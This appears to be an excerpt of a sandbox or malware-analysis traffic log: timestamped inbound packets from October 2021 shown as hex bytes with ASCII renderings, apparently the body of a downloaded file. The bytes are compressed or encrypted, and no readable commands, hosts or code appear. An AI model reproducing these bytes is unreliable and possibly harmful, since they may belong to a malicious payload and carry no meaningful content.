40 00 00 00 85 ec a5 fe 9c 93 00 00 08 6a e3 3c 82 e3 13 58 8a f1 12 35 ec 2c bf cb 15 c6 80 04 2b 76 5f e9 c8 b4 00 00 80 00 21 3b d2 ff 4e 45 a9 7f 9d 90 47 00 40 80 Data Ascii: ?\4X1/av/`?RM9_cjV/xBwJt{^_x#~fb%rjX~HTmSk$ew6@r_tNw6AW!"_@j<X5,+v_!;NEG@
2021-10-13 07:59:22 UTC	711	IN	Data Raw: d3 d9 fe bd 58 b2 67 f4 e5 1c 55 f0 02 7f 4e 51 c0 05 00 02 94 05 bb 93 fa 72 8e 00 3f 81 4b 10 72 ee 29 5d 6f b6 ff 80 00 0b 21 a7 f4 e4 6c 01 40 00 1f 4c ba c4 1c bd ec 3a c4 df e9 86 36 2f f6 9f c8 4e ef e0 bc 8d 67 f4 e4 62 00 00 50 0a 05 bb b3 fa 72 31 03 9c 3c b1 06 0e 42 fb 18 be 03 c1 a7 6f cc c9 e6 c4 76 8e 22 af c3 9c 2f cf 03 fe 00 00 02 eb e9 3f a7 29 a0 00 28 0b 52 ba 97 4f b9 a8 fb f3 2e a8 5f 99 87 29 cf 77 0d 26 c9 fd 39 4e 80 5b 93 3f a7 29 d0 00 00 0a 02 dd e9 fd 39 4e 8b ac a6 bf e8 4e ce de bd 5c de 99 b3 57 60 33 88 3d ed 79 9a 72 a1 c6 ed f3 59 3f a7 2a 00 00 00 02 f2 73 9f d3 95 00 50 00 27 f3 90 1a 69 94 00 2d dd 9f d3 92 58 00 00 00 16 ef cf e5 45 1b 56 28 00 00 00 2d de 9f d3 91 40 00 17 b9 ff ad be 52 b9 f3 92 ed 3c 56 e2 50 ad Data Ascii: XgUNQr?Kr)]o!l@L:6/NgbPr1<Bov"/?)(RO._)w&9N[?)9NN\W`3=yrY?*sP'i-XEV(-@R<VP
2021-10-13 07:59:22 UTC	719	IN	Data Raw: 28 00 40 00 00 4b bd 5f d3 98 a0 00 7a 10 8c e5 69 eb 4b fe 00 00 9d 6a d7 f4 e4 a8 00 00 00 27 fa 4e 2b 39 53 70 d0 70 5e 1b 68 73 0f 04 6e e9 7e 3e 23 39 4c 7e f6 f4 ca 8d 1f 86 20 63 df e0 f3 39 c5 6a fe 37 94 6c 49 0f 5f d3 93 b8 00 00 00 12 ef d7 f4 e4 ee 04 08 fb 47 d9 c9 99 d7 af e4 f3 0d 00 08 d6 00 01 37 db 57 f4 e4 9e 00 40 00 26 0f b8 c9 95 af 7f 9e d8 36 2f df 6d 0b 89 e9 f2 e4 2b d9 fd 4e 52 72 6e d7 97 fc 11 ac 9a 73 57 f4 e4 dc 00 10 00 00 4b bd 5f d3 93 70 25 b0 da 9f 63 d8 97 fc 11 ac 00 00 4b ef 5f d3 93 70 00 00 4d 0f 79 6b 39 34 ad 04 2c 55 ce c8 80 0b 1c 81 c9 ab b3 1f 7f 9c d7 35 fd 39 42 80 26 1e 95 fd 39 42 80 00 00 01 2e fd 7f 4e 50 a4 df 0f b5 3f 8f b1 3d 7f 0a b9 c8 ff 80 00 00 09 ae b5 7f 4e 50 a0 00 15 fc 9e 05 57 80 01 2e fd Data Ascii: (@K_ziKj'N+9Spp^hsn~>#9L~ c9j7lI_G7W@&6/m+NRrnsWK_p%cK_pMyk94,U59B&9B.NP?=NPW.
2021-10-13 07:59:22 UTC	727	IN	Data Raw: ca 62 ff 97 76 78 c9 68 a1 fd 2b 0e 53 1d df a6 13 16 5d 04 73 2c d5 aa 9e 40 e7 29 bf b8 9d d6 fd 5b bd 0f d6 70 5a 5a 7d 15 95 ff 3a fe 43 94 f1 80 00 09 f3 6a bf a7 35 10 00 00 02 bf 94 c2 64 c0 4b bf 5f d3 92 a0 00 00 00 12 ef d7 f4 e4 a8 01 36 05 af e4 44 e2 a4 00 00 13 7e c5 7f 4e 51 a0 00 00 79 e6 53 70 13 36 c4 bf e0 82 69 4d 5f d3 91 e8 00 00 00 12 ef d7 f4 e4 7a 15 fc 87 2a 27 00 00 00 25 df af e9 c8 a4 08 00 07 94 2a 05 7f 7b a8 d2 95 dd ec fb be bf ee a5 b5 75 53 0d 1b e7 8e d3 c9 8e f7 0b 74 1d 89 9a 30 e9 f5 9d 9d ac e7 7d cc 6a be f4 66 87 2a 2c e3 3b 59 63 da 30 ea 35 f0 df cd e9 9d df ed 1d f0 2a 2d a9 9d a6 55 2c 3c dc 29 8b 23 7a 97 bd a1 57 cb 62 bc 39 ee 2a 7f b0 fc b6 cc b6 3f 05 fc bc 19 ee 7f 8b 0e 54 af e2 74 ce 79 67 7e 76 b1 4b Data Ascii: bvxh+S]s,@)[pZZ}:Cj5dK_6D~NQySp6iM_z'%{uSt0}jf,;Yc05-U,<)#zWb9*?Ttyg~vK
2021-10-13 07:59:22 UTC	734	IN	Data Raw: 7a 33 34 e4 f8 26 53 1d 7c f2 90 9b 22 52 6f 9d 74 e4 5d 8c c3 af 05 ab 87 65 e5 f6 9d c4 b5 fe ec 9c 03 24 ac ec f5 75 1e bb 0d fc 32 05 df b6 69 51 13 59 b2 2a 5d 41 9f 33 ce c0 f1 1c 3c e1 62 3c a8 27 dd 9c f7 18 b0 44 6c e2 1a 37 4b 33 b0 d7 c1 45 78 f2 0a 2c a8 18 36 47 e0 0e f2 4e 76 4f cf de c0 ea 57 ce bc 59 45 fb 9d 59 c2 c1 2c 88 bb 93 1b 57 c2 fc a7 57 a3 42 79 7c 26 21 c9 05 82 f6 f6 ec 9c 5f 0b 28 83 58 45 9d 43 65 bc 28 18 77 28 6c e9 d1 b2 45 3c ae 0f 8c c9 8c 65 8c fc c9 f8 46 43 1d ea e4 cd 22 81 da 9a 43 bf 0f 03 7a ac c1 5d 03 1b 78 1e 38 3d 5d e0 6e d5 74 36 60 3c cd e8 de bf f8 05 b2 2a bb bc c2 27 cb d2 7c 08 f7 f8 0d 1e fe 5f ca bc 12 fc 14 a8 4b 95 87 ef 8e 63 c9 7b 37 b8 5f d4 b1 01 2f 82 ff cd 82 af 55 74 ab 71 47 5f 6f 93 41 fe Data Ascii: z34&S\|"Rot]e$u2iQY]A3<b<'Dl7K3Ex,6GNvOWYEY,WWBy\|&!_(XECe(w(lE<eFC"Cz]x8=]nt6`<'\|_Kc{7_/UtqG_oA
2021-10-13 07:59:22 UTC	742	IN	Data Raw: c4 ab 63 14 0b 68 b4 92 31 63 e3 c1 4c ae 47 c3 ff b3 76 0e 24 47 92 cb 2c 9a 91 64 ed fd 44 11 48 35 28 a9 83 21 88 aa f1 ac 05 62 19 1f d0 ab 91 ae 85 76 1f 8b dd 1d ca b0 d9 d8 82 c5 0e b0 59 83 66 8b 38 3c 3f 8a a8 7d 90 f2 23 64 18 9d 90 2e fd 34 41 c9 b3 9c 0a 58 26 e8 0d 79 58 09 b0 d5 7e 74 29 a3 1a 90 54 a1 ed f1 50 45 68 ad a6 cd c9 39 15 08 1c aa da 9d 01 ba 15 50 23 43 64 ab 31 5a 82 14 37 8a bd 15 f8 33 ad 8e d2 f1 a4 46 94 c7 58 97 a0 c8 55 b3 43 48 5b 35 d9 68 ad ce 5c 26 58 a5 45 8a 34 17 4b 30 cf 1c db 14 1b 4c aa 71 54 82 9d 44 fd d6 c4 58 20 ab 14 92 c9 63 ed 01 42 ae 46 b3 f3 23 39 70 fd b5 b9 15 d6 c8 11 3b c9 55 61 3f 11 86 2c 40 e7 fd 54 a8 e5 8d 98 2c d0 fd e6 68 5e c8 79 0f d9 06 23 b2 07 6c 29 11 a4 c4 e0 3a c9 03 c2 55 13 3a 8c Data Ascii: ch1cLGv$G,dDH5(!bvYf8<?}#d.4AX&yX~t)TPEh9P#Cd1Z73FXUCH[5h\&XE4K0LqTDX cBF#9p;Ua?,@T,h^y#l):U:
2021-10-13 07:59:22 UTC	750	IN	Data Raw: ed 4d e6 cf a3 3a 8b 5b 6c 53 e3 18 8f f0 b7 f5 9c 36 d3 26 0e 34 e2 f4 64 8f 3f e9 15 49 b2 51 b8 bf 15 20 29 55 4c 4b d7 2f 3a 00 ce 84 9c aa 63 0c c0 43 c7 7b 27 3e 78 d0 9b 63 4d 71 47 6d 5b 56 7f 69 9e 16 a9 c7 3b 2a b3 26 64 96 ff 92 0d a9 55 3b 33 f0 6e e6 84 04 fb 61 51 55 ad 5a e4 ff 37 bd b1 89 92 e5 41 f8 92 a7 e7 43 d3 2a 72 68 4a 7d 91 7f 51 10 ae 51 ae 86 a9 c2 6a 9f 2f 75 25 0f 39 3e c8 58 3a c4 cf 48 80 39 63 66 d4 fc 42 67 91 1d 3b c6 b5 ec 36 8e cf eb fd 5d fe cb bf 2c bd 3d 93 5d 0b ac f9 28 90 a1 4a 06 0f 00 85 3a 81 21 64 fe 29 55 4d 25 96 44 3b 68 22 c3 bc 06 a6 e5 3f dc ea 75 f0 e5 60 c4 de 35 fb b3 05 6c 34 b5 be a9 30 3c e4 34 b3 d1 86 43 5d 92 bb 94 45 a6 6a ff c8 e8 33 6b f9 ef a2 29 f7 bc f5 7b ee 7a bb 13 98 69 49 15 49 bf b0 Data Ascii: M:[lS6&4d?IQ )ULK/:cC{'>xcMqGm[Vi;&dU;3naQUZ7ACrhJ}QQj/u%9>X:H9cfBg;6],=](J:!d)UM%D;h"?u`5l40<4C]Ej3k){ziII
2021-10-13 07:59:22 UTC	758	IN	Data Raw: 82 22 8d 54 f7 91 9c ae 12 21 79 49 81 19 d2 59 51 e7 61 47 56 c8 5e bd bc 72 74 06 a8 64 57 5e a4 36 d3 90 a2 77 94 4e de 8f 78 ce e2 0e fc f2 41 02 9d fa 10 b3 ad 99 6d b5 2e 91 bf 52 b1 db a2 57 aa d9 b4 06 77 c9 10 99 82 34 fa 94 9b 4c c0 31 a4 52 37 fc a8 da a6 56 17 ea 67 f8 a7 37 21 5f ed 67 94 4a 56 b6 fb df e9 c0 73 4c 8f 5b 81 ae 52 02 6c a6 97 c2 a2 35 43 0e 8f a0 27 c1 47 d2 c7 af ec 03 c1 be 10 4a f2 bd 02 50 08 63 f8 ac 7e fe 47 58 ff 66 d5 5c 06 f8 2f fc 0b 4f 61 0b e9 5a d8 e4 ba 5d 45 bf d3 ae 32 a6 8b dd 3d f1 f3 6a 8c d7 00 a8 43 0a c1 26 09 44 82 6f 2f 1e eb ac be 57 6b bd 4e 35 14 8e 39 e9 ca af 69 96 95 8d 89 e8 ba 50 88 97 ed b5 37 23 8d b1 4b 94 44 af 76 ee 67 fc fe 90 82 bc 86 81 d4 54 3e 10 c3 1e 9b 87 9a 83 09 01 bb bd 34 7d 5e Data Ascii: "T!yIYQaGV^rtdW^6wNxAm.RWw4L1R7Vg7!_gJVsL[Rl5C'GJPc~GXf\/OaZ]E2=jC&Do/WkN59iP7#KDvgT>4}^
2021-10-13 07:59:22 UTC	766	IN	Data Raw: 93 dc 1c 12 e3 00 b0 dd c3 06 1f 81 97 82 3d e6 a1 91 d7 b9 64 5a 9c e5 f6 b2 fe 0e d4 21 3f 75 07 9d cc 19 44 a3 9d be 31 de 7d 94 19 c9 81 51 83 a8 81 a2 9f 1c 80 3d eb f7 10 27 2b 23 78 11 50 4f 71 81 01 75 99 ac 44 b9 f6 f9 02 25 b1 6a 53 27 26 c4 dc 22 81 45 80 54 7c 63 2c fd 9f 8f 16 b9 72 6a fc fd 87 44 eb 53 5c a3 5c a6 fd 85 84 c5 df 8c ca 62 e5 a6 ac 6a 99 6a 39 e6 7e 9d 24 8b 9c 7c 9f eb 09 63 b7 c1 88 eb 9f 9d a3 9e 53 41 14 a3 d0 38 89 b3 9d ce 86 53 e7 e6 bf dc 47 d7 59 82 67 e6 60 0b 36 5a 4e cb 9d fb 9f 49 f9 b6 b8 1c 80 67 e7 ed 22 11 cd 9b 1d 20 99 b6 42 7e 6e 43 fd 53 12 07 27 6b 9a 2b ae 3e 75 38 15 63 cf 84 cd e1 e1 40 31 3b fd 64 55 5c 5e b3 28 be ae 6d 78 e3 10 61 60 e0 06 6c 15 b1 48 73 78 5d 3b ca c3 46 d3 15 5e 4a 21 58 82 7f bc Data Ascii: =dZ!?uD1}Q='+#xPOquD%jS'&"ET\|c,rjDS\\bjj9~$\|cSA8SGYg`6ZNIg" B~nCS'k+>u8c@1;dU\^(mxa`lHsx];F^J!X
2021-10-13 07:59:22 UTC	773	IN	Data Raw: 33 e8 9a 95 c1 99 ba 70 8a d1 ff e6 9d dd e8 2c 06 d4 99 8d 73 76 05 d1 23 84 43 8f 8a fb 3f db 2c 64 4f c2 8f 21 d5 0d 40 ba 0c 99 7a b6 42 c9 03 f3 88 e3 67 d9 99 d4 a2 d3 ed a9 9b 25 65 0d 2a eb d5 94 1a ed f1 7a 67 1e 78 99 32 fb ee 6c 4a ef c5 93 f8 84 12 17 c5 93 d8 a5 7e e5 64 a7 9d 93 2e 19 14 bf a8 eb 53 f6 cb 25 7b e2 f0 d4 3f 36 a5 62 da 93 8d 3c 85 90 01 64 bd 2a e0 b2 91 2b 21 54 b9 1d 6c 46 36 0c c0 8a c4 43 57 70 97 55 54 32 23 59 60 69 97 cf 54 99 24 c9 33 04 80 40 20 11 48 28 b0 5b 16 02 92 e1 06 44 24 20 ac 18 31 24 22 27 a1 b4 63 2e 22 d2 87 38 41 a9 09 25 c9 8d 98 70 c5 6d a3 7a 9d ab e7 52 8b de 97 b5 bd fe 97 be 22 82 a0 cc 21 67 a1 5a 20 25 18 20 5b 16 95 73 1e 1d 58 a0 c9 00 8c cf 99 bc 0f ba de f9 99 32 01 6f 6f 9f 3c ff 8f 3c fc Data Ascii: 3p,sv#C?,dO!@zBg%ezgx2lJ~d.S%{?6b<d+!TlF6CWpUT2#Y`iT$3@ H([D$ 1$"'c."8A%pmzR"!gZ % [sX2oo<<
2021-10-13 07:59:22 UTC	781	IN	Data Raw: d0 bb dd a9 69 7b a7 26 7b 75 2d 61 b6 3c 15 73 84 af c0 2f 6c dd 1e ba 74 d3 83 03 83 c6 e0 fc fc 1b 99 2b 84 f9 97 bc b0 1e 40 b2 a4 03 9b 32 bd f9 40 6e aa 51 c1 03 d6 34 d5 36 70 41 7a c9 0c f4 d1 34 63 43 14 a8 32 89 4b 48 4d 6f 7e 2b db 97 5f 12 e5 3d c1 99 19 c5 3b cf a4 59 33 17 9f cf 9f 7e 78 29 e7 b0 79 97 15 5f 75 0d 51 cf 98 60 91 2a 4d 4b ab 0d 77 22 14 cd 77 c2 5a 19 ea 77 2d 34 4d bd 7e d8 77 75 6c c2 2a 3c cb ff 2a 9d 60 76 29 c7 3a a4 95 60 ac 71 2b 9a 32 20 42 02 38 95 3e c6 9d fd cf d8 b7 81 79 42 dc 73 d4 15 73 24 97 7d d6 8a 7f af b4 29 33 79 a3 6e ae 50 9a 9b c2 27 13 74 f2 06 d2 72 b1 02 59 98 4e 3c 2c ac 60 54 c6 12 01 01 36 ef 34 03 38 06 20 59 63 3d f5 ee 68 34 35 4e 2d 6b 0e 42 77 fa c9 07 b4 5f ec 14 5f 62 eb 3b 33 58 76 86 a6 Data Ascii: i{&{u-a<s/lt+@2@nQ46pAz4cC2KHMo~+_=;Y3~x)y_uQ`MKw"wZw-4M~wul<*`v):`q+2 B8>yBss$})3ynP'trYN<,`T648 Yc=h45N-kBw__b;3Xv
2021-10-13 07:59:22 UTC	789	IN	Data Raw: 19 02 53 07 4f b7 2a 6e 4e 3e 87 f9 c5 04 c6 3b e1 57 62 61 c6 f7 b7 38 7e 25 ef c5 18 70 ad 35 3c 1d 3e d6 16 43 cb 69 f6 4e 0b 0f 23 64 2f 0e cf 5a 93 d4 f9 62 a6 4e cf 70 1c 67 a2 82 33 4f ac 73 da 1f 65 19 f0 f7 28 08 87 54 3c b2 d3 e9 c4 9a 9b c4 3b 1e 6e 0f 3e ef bc ef a2 f7 f5 f3 b3 69 54 41 3d 00 2a 23 ad aa f9 b9 f5 7b 7c ed 51 33 96 9e b2 e0 11 53 47 94 17 06 f9 5c 9e 0e b3 73 06 8f d5 63 f3 a5 9a 8e ce 7c b9 87 9a 18 96 7a 5d 6e ca 70 e2 1c 37 2b e2 4d b8 a1 0f 2c 22 1c 98 12 90 44 55 f6 2a e3 0b 1c 9a 22 d9 a5 47 df 96 52 c3 43 a9 84 46 09 41 d2 2b c5 9a 40 e2 69 6b 38 3e 8a 06 2d 53 c9 28 09 bc 74 6d 4c 1b 79 8e f1 16 93 77 67 5b 04 b4 d6 1f d2 09 e1 69 4d d9 59 e1 53 d0 40 62 1e 41 4b 31 c1 5f ff 22 70 22 4b a3 4f c7 d9 2c a9 91 0f 37 67 79 Data Ascii: SOnN>;Wba8~%p5<>CiN#d/ZbNpg3Ose(T<;n>iTA=#{\|Q3SG\sc\|z]np7+M,"DU*"GRCFA+@ik8>-S(tmLywg[iMYS@bAK1_"p"KO,7gy
2021-10-13 07:59:22 UTC	797	IN	Data Raw: b4 0e 56 a6 c6 d5 e5 b3 ce 2b cb 87 9c 97 8e 4c f9 ec c4 82 ff cf 94 f7 1c 37 97 2f 39 af 2e 9e 5d bc 54 af a7 b5 c6 c3 03 5b d9 13 04 a0 cb a7 88 c7 91 af 23 9e 47 bc 91 79 8e 79 8f 79 26 f3 22 f3 26 f3 2a f2 59 e6 69 e4 df 4f ae 70 d8 9d 79 dd bc cf 3c d0 3c ef 60 80 91 b7 ab 1d f3 4a 44 97 b3 84 2c 8c 78 ff 20 e8 2e 09 3a e3 70 c0 c7 90 6e 24 cc 6d 4d d7 4d 91 67 da ed cd 28 8d 57 c6 a0 e7 43 78 1c 0f a8 4d 7d f0 12 c8 c7 99 7c 49 8c 31 b0 37 11 a6 3d 03 71 1c 63 64 6e 23 cc 6c cd c4 89 8d a1 b8 c9 98 af 37 19 53 1e f9 b8 96 31 68 6e 33 46 3e 13 71 36 62 d6 f8 ef 73 86 38 66 e5 b6 32 24 55 e4 aa b1 3d d8 f3 68 94 bf e4 0c 52 c8 58 8c 92 c1 96 46 1a 9e d2 35 84 2d 55 c2 7d 64 90 fb fe 27 b2 52 77 07 4d 0d 90 34 0b aa e5 90 e3 1c 8b dd 2b 63 ea ae 91 75 Data Ascii: V+L7/9.]T[#Gyyy&"&*YiOpy<<`JD,x .:pn$mMMg(WCxM}\|I17=qcdn#l7S1hn3F>q6bs8f2$U=hRXF5-U}d'RwM4+cu
2021-10-13 07:59:22 UTC	805	IN	Data Raw: da 93 09 f9 82 cb 4b 51 c6 a9 cc c6 60 ce ab a0 c3 4e be 9d 6d 26 6d d7 cb 07 96 57 32 8a cf 96 95 77 6c 77 15 e3 2c 67 62 26 e6 d1 96 96 35 46 7b e7 5e b9 5e 7a 87 cb 4b 3b 23 32 ef 75 e7 10 44 0f 3b 3a ae a7 72 07 0c 52 6f f9 65 40 27 17 95 c8 34 c4 e5 2c 5a 7b d9 5c cb 1f 18 66 dc cc ac c6 ae 1f 1f df e5 55 81 6b ad 3e 5a 51 6f 9b a7 88 75 56 a0 b8 c7 c4 d1 1e a8 ce f6 0b 63 57 df 12 60 01 a2 a8 b8 65 a4 98 8e d1 62 a2 6e 1d 75 99 59 5d 67 58 59 67 42 1c cb b0 b1 ad 85 9a 2c b4 84 4e f0 2f aa 7e 6e ac 0f 4c 64 42 9f 8c f2 b9 3f 56 4c a5 8d f6 ce 08 1f ed 93 5e b9 d2 f7 73 8a 32 5a 73 9d 46 90 67 fb 1a 44 1a df aa d4 f2 5d 7b c1 20 98 59 58 60 e0 ff 29 f2 d0 e7 6c 40 b3 e5 9a 75 1c 39 65 a1 b3 a6 28 f9 f1 e6 4c 8d 32 c7 cb 43 d9 d3 b7 93 9e 63 d9 d6 12 Data Ascii: KQ`Nm&mW2wlw,gb&5F{^^zK;#2uD;:rRoe@'4,Z{\fUk>ZQouVcW`ebnuY]gXYgB,N/~nLdB?VL^s2ZsFgD]{ YX`)l@u9e(L2Cc
2021-10-13 07:59:22 UTC	813	IN	Data Raw: 38 b9 a4 24 69 ec 62 d0 ad 01 da 56 46 2a 55 04 ea e7 2e fb 86 62 2c 1d 69 35 84 3d cf df 56 9b 23 75 d0 28 28 f9 87 77 51 7f 90 c9 fb f1 eb 11 94 3f 02 1c 9a 16 74 ed 14 58 1d d8 ed 41 db 76 a1 f6 c7 9d 93 f5 a2 94 78 59 a8 a3 85 7e 11 35 65 3c b1 22 6c e4 47 8a c9 8f 8b f2 15 c3 71 55 ec ea 33 04 5c 0b ff 85 d0 b3 26 fd 67 cf e7 f4 9d 97 17 33 2b 2d d0 87 94 65 bf 78 42 67 eb 36 fb 95 c0 93 f0 36 0f 13 b4 f5 08 49 08 e5 cd b2 5c eb 7f fa 9f 20 f0 e5 3b e5 80 b4 b1 9b af 68 82 65 a3 d1 3d 42 41 fa 8c f6 24 ee 35 0e bc e2 fd 6a eb ca 24 cf 28 cf 5d d4 5b 13 36 c9 6f 12 a1 e2 a4 bb f4 80 04 dc 3c f5 37 9e fc 78 1c 5d 71 1c 5d 55 f1 c9 d7 2a 23 75 d8 b1 5a 3f e3 a0 4a c0 18 59 01 4c 5c ee 60 54 65 86 e3 f3 4f 40 f5 d5 39 bf fb 3c 42 2d 8d e3 62 46 72 e8 17 Data Ascii: 8$ibVFU.b,i5=V#u((wQ?tXAvxY~5e<"lGqU3\&g3+-exBg66I\ ;he=BA$5j$(][6o<7x]q]U#uZ?JYL\`TeO@9<B-bFr
2021-10-13 07:59:22 UTC	820	IN	Data Raw: fd 87 88 75 ed 2f 26 9e da 67 c7 71 3e 79 f9 0b 67 62 ac 03 41 88 74 72 78 e4 1b a8 42 48 13 b1 68 f4 d2 11 ca 91 b9 3a 5a 48 37 3e 47 eb 24 81 7c 2b 06 ed 3d 4b 49 85 6c a0 5b de db c6 53 3e 05 cd c7 ec 70 d8 f7 cd 91 38 10 9c 0a ee e1 8b 25 71 20 67 22 80 8f 01 d2 e6 98 ae 98 ae fd 3f e1 02 7e 84 10 91 f8 d7 ff b3 00 20 9c 04 6f a6 86 26 5c 93 88 a1 25 94 d1 68 b9 fe 72 ea bf 75 1c ff d6 4f dc 93 fe cc d1 c0 ec 11 80 81 9a d2 3c a1 d8 10 79 3c 7c ac 0e 76 ec 74 3f a2 fd d9 76 d9 12 fd ec 64 f5 92 7c 49 26 81 4d f3 1f e0 7f 9c 39 75 b7 f1 c0 5f 5f e4 86 1f 66 5f b6 52 7d 99 36 b2 77 52 7a 2f 29 0a c1 06 b2 4e c6 4f 43 e5 a1 69 ff 50 0f ff fb 63 27 60 b9 e5 49 7d b2 42 e2 97 db 99 3a 15 cf df 27 d0 93 f1 c9 eb bc c4 28 f1 13 40 39 45 8c ce d5 0a 35 40 df Data Ascii: u/&gq>ygbAtrxBHh:ZH7>G$\|+=KIl[S>p8%q g"?~ o&\%hruO<y<\|vt?vd\|I&M9u__f_R}6wRz/)NOCiPc'`I}B:'(@9E5@
2021-10-13 07:59:22 UTC	828	IN	Data Raw: 9d 52 22 dc 68 7f 40 f9 94 50 e5 d0 4a 5a 5f 94 5b dc 3d 87 88 29 cd 59 78 2b 7a 80 29 b8 e6 c9 58 3b cd 87 64 a1 ec 8c 81 1b 85 d6 81 06 62 cf 8f 90 d2 e2 87 c7 d6 d3 4e a8 77 99 da 6e e2 f2 1c 58 70 4b 75 10 03 d7 65 45 b7 d0 1d 27 2e 24 8f e8 d1 90 fa 3f 78 6e ed ff 6c 5d 22 61 f2 86 de 81 c3 ea b2 e5 b4 0b b7 d9 08 74 37 c3 98 7d fd 9b 07 31 7e 4a 0a 3d e8 e1 cb 3d fc 9b 5b 6e 03 af af 17 df e3 45 da fd 6a 2d aa da 2b d7 36 e0 45 d5 30 cc 89 b6 b3 ea ac 62 74 20 c2 9b de 2f b7 ce 71 22 fc 13 22 49 0c 9c 4e 4d 96 18 18 32 b7 6e 58 c5 76 e5 2d e2 4e 22 99 63 98 4b c1 3b 1b b5 53 d9 82 fe 2f 28 da df 8d 0b 78 13 3f 57 f2 6d 17 3a d8 be f2 16 d2 4e d1 ce d8 dc ce e6 eb 30 50 fc cb 11 47 36 97 22 59 76 b3 31 16 f7 51 64 ae 7c ca 1f 3f 1e 07 84 36 30 e8 b5 Data Ascii: R"h@PJZ_[=)Yx+z)X;dbNwnXpKueE'.$?xnl]"at7}1~J==[nEj-+6E0bt /q""INM2nXv-N"cK;S/(x?Wm:N0PG6"Yv1Qd\|?60
2021-10-13 07:59:22 UTC	836	IN	Data Raw: 36 99 d2 28 f7 5d 0b 22 1b 58 12 dc c6 7a 1f bf 70 cd df 86 3d a5 71 9e 8f 6f 27 c9 3a c2 13 45 87 ba e6 c9 3f e5 ca 40 2a 3f c9 64 54 4a 72 a4 8e 4e 02 81 8b 01 17 5a 90 42 0f 26 fa 1c ea db 72 d3 73 b7 59 72 f6 12 17 fc 3b 2e 6e bb 5e 2a 63 ab 15 63 79 22 17 a4 62 1a ab 66 7c 8e 4d 7b a3 f4 a6 86 3d 2f 68 39 21 53 e8 40 41 5a d0 da 73 43 65 05 10 15 e0 82 91 a7 e7 46 65 35 84 a1 7a ae ae 18 d9 61 a9 22 1d 24 a6 bd af 67 ef 19 9d 57 95 1e d8 ff da 7d 21 e2 d3 55 15 a6 1c aa d4 5e 89 36 69 a9 22 ed 1c 25 7f 4b 72 68 5c cd a3 4c a9 93 d4 cc d3 af 49 fc 45 1f 44 2d b8 43 82 5e b0 ac a3 f7 2c 34 a5 45 4f 9a 15 34 d4 bc 39 3a 18 fa b4 fd a7 66 03 d8 09 4d 59 61 23 11 06 be 56 a3 4f b8 89 f4 2b d8 a8 23 62 a7 3c 1a 26 6e 94 6d 34 89 fe a1 df c7 fe 06 ba 9c e4 Data Ascii: 6(]"Xzp=qo':E?@?dTJrNZB&rsYr;.n^ccy"bf\|M{=/h9!S@AZsCeFe5za"$gW}!U^6i"%Krh\LIED-C^,4EO49:fMYa#VO+#b<&nm4
2021-10-13 07:59:22 UTC	844	IN	Data Raw: c5 92 fd cd 59 de 53 92 d3 dc f0 da 90 9d 9f fb d2 8f d0 f9 ec c7 47 a6 43 9c fc c2 45 86 a0 3a 42 f0 5d b7 2e 76 ef 82 ee d4 60 46 49 0f 9d d5 8f 14 3f 19 12 75 2d 77 df 60 c6 60 92 09 80 7e 30 95 cd 63 0d 7e d0 fa a1 ad ce ab 52 62 72 8e 66 c2 6d af dc 45 32 b6 9d ba 45 80 55 ea 9b 77 cc 39 cd 4d 09 2f 73 0f 80 3d 7f 10 d2 4a a7 a8 0e fd 04 7e 84 38 6f 91 dd 8c d2 d5 30 9f bb 5c 59 ba 39 a3 43 17 ea 91 f9 51 f4 c5 e4 c4 21 52 e9 d5 a5 e2 c7 28 57 a2 be 40 a3 b6 ad 24 f8 14 da 6f 0d 81 f9 aa 2c 90 1a 8f aa 35 5d 38 68 c6 e7 ab 15 4f 72 49 5a af 55 95 4a a2 35 4c ea 8a b2 e4 fb 82 d8 f8 92 c0 63 a3 54 22 2c ca e2 fd d7 86 b1 46 7d 38 c9 55 03 63 b7 9b 79 65 d3 9f 44 1d d3 9b 69 9d 10 65 2f 28 63 43 46 d0 30 61 9f cd 25 40 9c 0b e7 e9 c4 ff 11 cd 28 19 ae Data Ascii: YSGCE:B].v`FI?u-w``~0c~RbrfmE2EUw9M/s=J~8o0\Y9CQ!R(W@$o,5]8hOrIZUJ5LcT",F}8UcyeDie/(cCF0a%@(
2021-10-13 07:59:22 UTC	852	IN	Data Raw: 8b 46 c8 2a b3 62 62 59 df 9f 20 45 ad 27 0b c6 1c 33 61 01 82 06 83 04 77 25 17 ab 58 2a 14 8e e9 21 02 af e3 5d cd 9f e4 bc a0 30 46 dc cf 00 c2 37 5f 3f 1b 6d 07 01 64 ef 98 26 f8 85 a5 e2 39 36 a1 2f 97 46 1c 15 0e 46 4b 91 03 8f 92 e3 88 e1 c2 66 28 43 66 7c 2d 93 76 a8 34 36 1a 76 f1 b0 f4 71 a2 b7 73 09 3f 4f 98 9b d6 d7 80 7d 0c 4a 25 d8 7f f1 f5 c6 2c 08 d4 9a 3c b6 5b ef 91 94 96 e0 fa 23 65 2e ec 36 7f 24 5f 54 5a f6 97 ec 9a 52 b4 5c c5 e6 26 c1 82 13 d0 62 59 86 af cc 6c ca c1 dc b6 8f 9a 25 b0 f0 db 5f ab 19 9f 65 f2 9e fc b9 15 94 c1 c6 5c 9b dc 6a ff 4b e5 fd 97 67 17 2c 5b 58 51 e8 a3 a2 b4 7f e7 be 8a 65 67 34 4a 6c 29 86 20 d2 79 97 bf 45 39 2b bf eb 8d a1 bf 2e d9 ee 5b 0c 25 52 7d 0b bd b7 f8 de 33 38 7f ea fc 6c f9 3e 95 d9 75 96 c2 Data Ascii: FbbY E'3aw%X!]0F7_?md&96/FFKf(Cf\|-v46vqs?O}J%,<[#e.6$_TZR\&bYl%_e\jKg,[XQeg4Jl) yE9+.[%R}38l>u
2021-10-13 07:59:22 UTC	859	IN	Data Raw: aa 9c eb 14 c1 8c 7f f2 29 54 62 0b 5d a1 f3 79 a7 c2 40 f7 40 9e a1 8d 43 8e 9b b8 f1 b3 09 f5 f1 ba f5 d2 be fa 32 ba bb 11 65 2b ac 33 78 ae c1 bc 46 13 a2 19 4b c7 05 9f 77 e0 68 4d 77 d4 d5 1f a6 1d b4 79 8e 5e f6 a5 68 1b 68 0a 75 5c 59 a7 0c c1 68 9d 68 50 3f f8 e4 41 43 ee 81 c9 f7 a8 11 dc 0c d9 e4 89 05 4e c3 6f cf 39 3c ef eb ff c4 06 31 57 79 81 e7 04 e7 e1 83 3b 64 06 25 0d 3e 46 8c 98 91 94 e5 5b 5c 15 6c fd 08 48 50 dc 08 b7 fe 47 82 4b 38 06 15 c7 f4 f6 9c 24 69 57 a8 e0 a2 c8 b0 4c 43 aa b5 3c 5f df 6a 4a de d7 b6 f7 be 4b 93 2d f9 b1 ba e8 04 0b 5f d5 9e 6c 3e 9a 38 c2 77 f1 30 